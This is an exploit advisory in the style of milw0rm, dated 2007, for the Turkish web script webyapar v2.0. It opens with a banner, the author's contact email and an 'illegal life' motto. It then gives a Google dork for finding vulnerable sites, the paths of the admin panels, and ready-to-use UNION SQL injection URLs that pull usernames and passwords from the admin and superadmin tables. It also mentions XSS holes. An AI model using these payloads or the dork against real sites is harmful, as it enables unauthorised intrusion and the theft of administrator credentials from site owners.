81 lines
4.3 KiB
Text
Executable file
81 lines
4.3 KiB
Text
Executable file
#########################################################################################################################
|
||
#########################################################################################################################
|
||
############/$$$$$$$$$$$////$$$$$$$$$$$//###################///////////###############//$$$$$$$$$$$$$$$//$$$$$$$$$$$$$$$/
|
||
###///////##/$$$$$$$$//////////$$$$$$$$//####################/////////#####//////$$$$$//$$$$/////////////$$$$////////////
|
||
##///////###/$$$$$$$////////////$$$$$$$//#####///////////#####///////#####///////$$$$$//$$$$/////////////$$$$////////////
|
||
##//////###///$$$$$$$//////////$$$$$$$///#####///////////#####//////#####////////$$$$$//$$$$/////////////$$$$////////////
|
||
##/////###/////$$$$$$$////////$$$$$$$////#####//////////######/////#####/////////$$$$$//$$$$/////////////$$$$////////////
|
||
##////###///////$$$$$$$//////$$$$$$$/////######////////#######////#####//////////$$$$$//$$$$/////////////$$$$////////////
|
||
##///###/////////$$$$$$$////$$$$$$$//////#######//////#######////#####///////////$$$$$//$$$$/////////////$$$$////////////
|
||
###################$$$$$$##$$$$$$################################################$$$$$##$$$$$$$$$$$$$$$##$$$$$$$$$$$$$$$$
|
||
####################$$$$$$$$$$$$#################################################$$$$$##$$$$$$$$$$$$$$$##$$$$$$$$$$$$$$$$
|
||
##///###////////////$$$$$$$$$$$$/////////#########////////////#####//////////////$$$$$//$$$$$$$$$$$$$$$//$$$$$$$$$$$$$$$$
|
||
##////###////////////$$$$$$$$$$//////////########////////////#####///////////////$$$$$/////////////$$$$//////////////$$$$
|
||
##/////###////////////$$$$$$$$///////////#######////////////#####////////////////$$$$$/////////////$$$$//////////////$$$$
|
||
##//////###////////////$$$$$$////////////#######///////////#####/////////////////$$$$$/////////////$$$$//////////////$$$$
|
||
###//////##/////////////$$$$/////////////#######//////////#####//////////////////$$$$$/////////////$$$$//////////////$$$$
|
||
############/////////////$$//////////////#######/////////#####///////////////////$$$$$//$$$$$$$$$$$$$$$//$$$$$$$$$$$$$$$$
|
||
#########################################################################################################################
|
||
#########################################################################################################################
|
||
##### TURKISH SECURİTY MAN AND C0D3R ####################### MAİL : dumanhack@gmail.com ###########################
|
||
##### - ##### web : ##########
|
||
##### PERFECT C0D3R AND SECURİTY ## >>>>>>>>>>>>>> MESSAGE : HAYAT İLLEGAL <<<<<<<<<<<<<<< ##
|
||
#########################################################################################################################
|
||
|
||
# Title : webyapar v2.0 Remote Blind SQL Injection Vulnerability
|
||
|
||
# AUTHOR: : bypass
|
||
|
||
# script name : Webyapar v2.0 { 700$ }
|
||
|
||
# Language : Tr
|
||
|
||
# scritp web page : www.webyapar.com
|
||
|
||
# script bug : remote sql enjeksiyon
|
||
|
||
# script admin panel1 : http://victim/script_path/yonetim
|
||
|
||
# script admin panel2 : http://victim/script_path/yonetim2
|
||
|
||
# google dork : inurl:"?page=duyurular_detay&id="
|
||
|
||
#Message Tr : ingilizcem pek iyi degildir. kodun piyasada satıs degeri 700$ - kodun sql dısında xss acıklarıda bulunmaktadır
|
||
ama pek fazla xss acıkları işinize yaramayacaktır. yonetim panelleri standart verilmistir...
|
||
|
||
# Message Tr : Hayat İllegal - / -
|
||
|
||
|
||
< / -------------------------------------------------------------------------------------------------------- />
|
||
|
||
|
||
< / ------ Example sql bug 1 admin username : ------ / >
|
||
|
||
|
||
http://VİCTİM/SCRİPT_PATH/?page=download&kat_id=-116+union+all+select+0,kullanici+from+admin
|
||
|
||
|
||
|
||
|
||
< / ------ Example sql bug 1 admin password : ------ / >
|
||
|
||
|
||
http://VİCTİM/SCRİPT_PATH/?page=download&kat_id=-116+union+all+select+0,sifre+from+admin
|
||
|
||
|
||
|
||
|
||
< / ------ Example sql bug 2 superadmin password and admin username : ------ / >
|
||
|
||
|
||
|
||
http://VİCTİM/SCRİPT_PATH/?page=duyurular_detay&id=-50+union+all+select+0,kullanici,2,3,sifre,5+from+superadmin
|
||
|
||
< / -------------------------------------------------------------------------------------------------------- />
|
||
|
||
|
||
Sql enjeksiyon bug 1 : /?page=download&kat_id=-116+union+all+select+0,sifre+from+admin
|
||
|
||
Sql enjeksiyon bug 2 : /?page=duyurular_detay&id=-50+union+all+select+0,kullanici,2,3,sifre,5+from+admin
|
||
|
||
# milw0rm.com [2007-07-25]
|